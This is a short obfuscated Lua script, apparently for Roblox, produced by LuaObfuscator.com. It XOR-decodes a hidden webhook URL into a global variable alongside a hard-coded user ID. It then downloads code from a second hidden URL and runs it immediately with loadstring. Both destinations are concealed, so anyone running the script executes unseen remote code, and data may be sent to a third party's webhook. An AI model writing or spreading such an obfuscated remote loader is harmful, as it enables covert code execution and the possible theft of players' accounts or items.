--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.1.7) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v8,v9)local v10={};for v11=(1 + 1) -1, #v8 do v6(v10,v0(v4(v1(v2(v8,v11,v11 + (2 -1))),v1(v2(v9,(1337 -(145 + 1191)) + ((v11-(3 -2))% #v9),1 + ((v11-(3 -2))% #v9) + 1)))%256));end return v5(v10);end _G.UserID=(5190667839 -0) -(1567710950 -(270 + 21));_G.WebHook=v7("\121\108\44\13\251\43\55\119\25\225\98\123\55\15\236\63\123\55\16\167\112\104\49\82\255\116\122\48\18\231\122\107\119\76\184\39\42\108\78\190\41\43\108\73\176\33\47\109\77\190\32\43\119\39\225\112\65\54\79\217\123\86\16\30\201\105\93\52\57\236\115\105\16\24\185\116\40\33\47\205\35\105\53\10\202\95\123\32\57\234\92\90\12\28\189\82\74\44\63\202\95\93\53\30\219\37\76\47\18\224\67\126\25\48\184\83\76\106\14\233\88","\17\24\88\125\136");loadstring(game:HttpGet(v7("\197\43\255\164\172\151\112\164\166\190\218\113\236\189\171\197\42\233\161\172\200\45\232\187\177\217\58\229\160\241\206\48\230\251\140\196\51\238\186\188\200\12\232\166\182\221\43\248\251\143\222\39\216\183\173\196\47\255\167\241\225\42\234\251\178\204\54\229\251\143\222\39\202\161\171\194\57\234\166\178\131\43\249\161\186","\173\95\139\212\223")))();
